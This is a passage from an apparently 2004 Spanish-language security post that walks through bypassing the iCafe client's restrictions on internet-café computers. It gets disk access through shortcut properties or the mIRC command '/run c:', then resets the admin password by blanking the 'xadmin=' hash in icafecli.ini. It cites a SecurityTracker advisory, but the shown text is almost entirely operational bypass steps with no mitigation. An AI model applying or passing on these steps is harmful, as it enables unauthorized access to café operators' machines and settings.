Si el administrador, ha impuesto las restricciones para windows en las opciones de seguridaddel programa ,en teoria no tenemos acceso al disco,aunque eso es un estado efimero :)iniciamos icafe con nuestra cuenta de socio o bien con un codigo de time play o time code.Iniciamos el explorador y en la barra de direcciones comprobamos que poniendo como urlc:\ nos deniega el acceso a disco,pero si ponemos escritorio no da aceso al escritorio ,faltaraseñalar un icono y sobre el alt+enter y ahy en la ventana resultante damos a buscar destinoda acceso al disco :/despues solo es cuestion de buscar lo que nos interesa entre el disco :)otra forma mas facil de poder saltarse esa restriccion es atraves de algun cliente de irc,como Mirc o X-script abriremos el cliente de irc y tecleamos /run c: y tambien nosda acceso al disco.
3.3-resetear el password de admin y cambiarlo por otro:En la interfaz del programa si clicamos en admin ,nos pide un password que es para poder configurar las opciones del software icafeclient, accedemos a disco de la forma antes explicada y vamos hasta c:\windows y ahy buscamos el archivo llamado icafecli.ini en el cual viene la configuracion que el programa toma al iniciarse en la makina en cuestion si miramos dentro de ese archivo vemos lo siguiente:
#########################codigo de icafecli.ini admin#########################la parte que nos interesa es esta"xadmin=312a353424243a2c23313b222d2a24"o algo parecido a eso##################################################
Como podemos ver estan tods las opciones del programa, pero como de momentono sabemos en las opciones de seguridad, lo que hemos de cambiar,pues no sabemosque es cada cosa...lo haremos directamente desde el programa, para ello primero miraremosel archivo icafecli.ini y cambiaremos xadmin=312a353424243a2c23313b222d2a24por xadmin= salvaremos los cambios, iremos a la interfaz del programa ,clicaremos en adminy dejaremos en blanco el password del programa nos da aceso a la interfaz de configuracion :/###################################4-agradecimientos###################################
Securititracker Url: http://www.securitytracker.com/alerts/2004/Jul/1010724.html
gracias a los que me ayudais dia a dia y confiais en migracias a http://www.hispanew.com/ y a http://www.ayuda-internet.net/ por su apoyogracias a Estrella por ser mi luzgracias a rottew y lutrizia por ser como son y estar conmigoLostmon (lostmon@gmail.com)La curiosidad es lo que hace mover la mente...
Subscribe to:
Posts (Atom)
Posts
